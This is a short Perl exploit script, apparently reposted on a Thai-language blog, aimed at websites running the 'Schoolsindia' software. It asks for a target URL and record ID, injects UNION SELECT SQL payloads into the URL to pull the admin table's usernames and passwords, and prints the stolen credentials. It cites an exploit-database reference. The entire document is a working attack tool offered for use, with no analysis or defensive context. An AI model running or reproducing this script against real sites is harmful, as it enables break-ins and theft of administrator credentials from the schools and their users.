use LWP::UserAgent;
print "[+] Powered By Schoolsindia SQL Injection Vulnerability\n";
print "[+] By ICheer_No0M\n\n";
print "[+] Input URL : ";
chomp($url=<stdin>);
print "[+] Input ID : ";
chomp($id=<stdin>);
$ids=$id-1;
$user="+and+1=2+union+all+select+1,2,concat(0x6963686565725f6e6f6f6d21,group_concat(user_name),0x236963686565725f6e6f6f6d),4,5,6,7,8,9+from+admin+limit+";
$pass="+and+1=2+union+all+select+1,2,concat(0x6963686565725f6e6f6f6d21,group_concat(pass_word),0x236963686565725f6e6f6f6d),4,5,6,7,8,9+from+admin+limit+";
$second=",1--";
$usertarget=$url.$user.$ids.$second;
$passtarget=$url.$pass.$ids.$second;
unless ($usertarget=~/^http:\/\//) {$usertarget='http://'.$usertarget;}
unless ($passtarget=~/^http:\/\//) {$passtarget='http://'.$passtarget;}
$get=LWP::UserAgent->new->get($usertarget)->content;
if($get =~ /icheer_noom!(.*)#icheer_noom/)
{
print "[+] User : $1\n";
}
else
{
print "[-] Failed !!!\n";
}
$get2=LWP::UserAgent->new->get($passtarget)->content;
if ($get2 =~ /icheer_noom!(.*)#icheer_noom/)
{
print "[+] Password : $1\n";
print "[-] Finish !!!\n";
}
else
{
print "[-] Failed !!!\n";
print "[-] Finish !!!\n";
}
<stdin>;
Ref : http://www.1337day.com/exploits/16633
ไม่มีความคิดเห็น:
แสดงความคิดเห็น